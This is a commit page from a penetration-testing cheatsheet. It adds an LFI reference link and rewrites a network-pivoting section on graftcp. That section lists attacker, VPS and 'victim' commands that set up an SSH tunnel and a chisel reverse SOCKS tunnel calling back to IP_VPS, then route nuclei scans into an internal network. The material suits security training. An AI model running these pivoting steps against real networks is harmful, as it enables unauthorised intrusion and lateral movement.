Graftcp Cheatsheet

nanox · Dec 29, 2021 · c9ef8f7 · c9ef8f7
1 parent 8411a06
commit c9ef8f7
Show file tree

Hide file tree

Showing 2 changed files with 34 additions and 7 deletions.
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
@@ -433,3 +433,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
 * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
+* [PHP LFI with Nginx Assistance](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
@@ -82,17 +82,43 @@ socks4 localhost 8080
 
 Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 
-## Graphtcp
+## Graftcp
 
-Same as proxychains, with another mechanism to "proxify" which allow Go applications.
+> A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy.
 
-```powershell
-git clone https://github.com/hmgle/graftcp.git
-cd graftcp && make
-graftcp-local/graftcp-local
-./graftcp chromium-browser
+:warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications.
+
+```ps1
+# https://github.com/hmgle/graftcp
+
+# Create a SOCKS5, using Chisel or another tool and forward it through SSH
+(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
+(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 
+(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks 
+
+# Run graftcp and specify the SOCKS5
+(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
+(attacker) $ graftcp ./nuclei -u http://172.16.1.24
+```
+
+Simple configuration file for graftcp
+
+```py
+# https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf
+## Listen address (default ":2233")
+listen = :2233
+loglevel = 1
+
+## SOCKS5 address (default "127.0.0.1:1080")
+socks5 = 127.0.0.1:1080
+# socks5_username = SOCKS5USERNAME
+# socks5_password = SOCKS5PASSWORD
+
+## Set the mode for select a proxy (default "auto")
+select_proxy_mode = auto
 ```
 
+
 ## Web SOCKS - reGeorg
 
 [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.